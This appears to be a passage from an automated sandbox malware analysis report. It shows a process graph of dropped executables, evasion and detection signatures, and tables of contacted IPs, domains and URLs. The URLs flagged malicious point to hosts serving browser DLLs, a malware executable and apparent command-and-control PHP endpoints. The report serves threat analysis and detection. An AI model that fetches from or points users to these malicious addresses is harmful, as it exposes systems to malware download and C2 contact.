77.91.77.82, 49718, 49721, 49723 FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU Russian Federation 13->73 53 C:\Users\user\AppData\...\06f6d9547f.exe, PE32 13->53 dropped 55 C:\Users\user\AppData\...\0244247334.exe, PE32 13->55 dropped 57 C:\Users\user\AppData\Local\...\random[1].exe, PE32 13->57 dropped 59 C:\Users\user\AppData\Local\...\random[1].exe, PE32 13->59 dropped 115 Hides threads from debuggers 13->115 117 Tries to detect sandboxes / dynamic malware analysis system (registry check) 13->117 119 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 13->119 21 06f6d9547f.exe 1 13->21         started        24 0244247334.exe 12 13->24         started        file5 signatures6 process7 signatures8 26 CFBAKEHIEB.exe 4 17->26         started        30 conhost.exe 17->30         started        32 conhost.exe 19->32         started        89 Antivirus detection for dropped file 21->89 91 Multi AV Scanner detection for dropped file 21->91 93 Binary is likely a compiled AutoIt script file 21->93 34 chrome.exe 21->34         started        95 Detected unpacking (changes PE section rights) 24->95 97 Machine Learning detection for dropped file 24->97 99 Hides threads from debuggers 24->99 process9 dnsIp10 63 C:\Users\user\AppData\Local\...\explorti.exe, PE32 26->63 dropped 123 Antivirus detection for dropped file 26->123 125 Detected unpacking (changes PE section rights) 26->125 127 Machine Learning detection for dropped file 26->127 129 5 other signatures 26->129 37 explorti.exe 26->37         started        65 192.168.2.5, 443, 49577, 49703 unknown unknown 34->65 67 239.255.255.250 unknown Reserved 34->67 40 chrome.exe 34->40         started        43 chrome.exe 34->43         started        45 chrome.exe 34->45         started        file11 signatures12 process13 dnsIp14 101 Antivirus detection for dropped file 37->101 103 Detected unpacking (changes PE section rights) 37->103 105 Tries to detect sandboxes and other dynamic analysis tools (window names) 37->105 107 6 other signatures 37->107 75 www3.l.google.com 142.250.181.238, 443, 49756 GOOGLEUS United States 40->75 77 www.google.com 172.217.16.196, 443, 49738 GOOGLEUS United States 40->77 79 4 other IPs or domains 40->79 signatures15
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
85.28.47.30
 unknown Russian Federation
31643 GES-ASRU true
77.91.77.82
 unknown Russian Federation
42861 FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU true
216.58.206.46
 youtube-ui.l.google.com United States
15169 GOOGLEUS false
142.250.181.238
 www3.l.google.com United States
15169 GOOGLEUS false
239.255.255.250
 unknown Reserved
unknown unknown false
77.91.77.81
 unknown Russian Federation
42861 FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU true
172.217.16.196
 www.google.com United States
15169 GOOGLEUS false

Private

IP
192.168.2.5

Contacted Domains

Name IP Active
youtube-ui.l.google.com 216.58.206.46 true
www3.l.google.com 142.250.181.238 true
play.google.com 216.58.206.46 true
www.google.com 172.217.16.196 true
accounts.youtube.com unknown unknown
www.youtube.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://85.28.47.30/69934896f997d5bb/softokn3.dll true
  • Avira URL Cloud: safe
 unknown
http://85.28.47.30/69934896f997d5bb/freebl3.dll true
  • Avira URL Cloud: safe
 unknown
http://77.91.77.82/Hun4Ko/index.php true
  • Avira URL Cloud: phishing
 unknown
http://85.28.47.30/69934896f997d5bb/nss3.dll true
  • Avira URL Cloud: safe
 unknown
http://85.28.47.30/69934896f997d5bb/msvcp140.dll true
  • Avira URL Cloud: safe
 unknown
http://85.28.47.30/69934896f997d5bb/mozglue.dll true
  • Avira URL Cloud: safe
 unknown
https://www.youtube.com/account false
  • Avira URL Cloud: safe
 unknown
https://www.google.com/favicon.ico false
  • Avira URL Cloud: safe
 unknown
http://77.91.77.81/mine/amadka.exe true
  • Avira URL Cloud: malware
 unknown
http://85.28.47.30/69934896f997d5bb/sqlite3.dll true
  • Avira URL Cloud: safe
 unknown
http://85.28.47.30/69934896f997d5bb/vcruntime140.dll true
  • Avira URL Cloud: safe
 unknown
85.28.47.30/920475a59bac849d.php true
  • Avira URL Cloud: safe
 unknown
http://85.28.47.30/920475a59bac849d.php true
  • Avira URL Cloud: safe
 unknown
https://play.google.com/log?format=json&hasfast=true&authuser=0 false
  • Avira URL Cloud: safe
 unknown